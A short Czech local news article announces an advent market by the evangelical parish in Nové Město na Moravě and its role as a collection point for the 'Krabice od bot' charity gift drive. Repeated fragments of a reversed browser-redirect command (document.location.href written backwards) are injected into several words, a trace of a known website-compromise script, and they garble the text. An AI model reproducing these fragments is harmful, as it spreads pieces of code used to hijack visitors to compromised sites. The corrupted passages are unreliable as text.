Rainbow page separator

Na adventní jarmark je možné přinést i dárky do krabice od bot

Pondělí, 8. listopadu 2021

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Adventní jarmark na první adventní neděli, jež le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos připadá na 28. lis[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];topadu, připravuje novoměstský evangelický farní sbor. Uskuteční se v době od 14 do 17 hodin v parku u kostela a v presbytáři. Lidé si na něm mohou zakoupit například rukodělné výrobky nebo různé pochoutky, fairtradové zboží z obchůdku Jeden svět, výrobky Diakonií Myslibořice a Rolnička, horké polévky, čaj, kávu nebo svařené víno. Nákupem současně podpoří činnost neziskových organizací, jako jsou Usměváčci, Portimo, Sdružení Krajina, případně i klienty místního chráněného bydlení.
Pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tože novoměstský adventní jarmak bude současně jedním ze sběrných míst již jedenáctého ročníku celorepublikové charitativní akce Krabice od bot, dárci tam mohou přinést vánoční dárky určené dětem ze sociálně znevýhodněného prostředí. Podrobné informace jsou k dispozici na webu www.krabiceodbot.cz.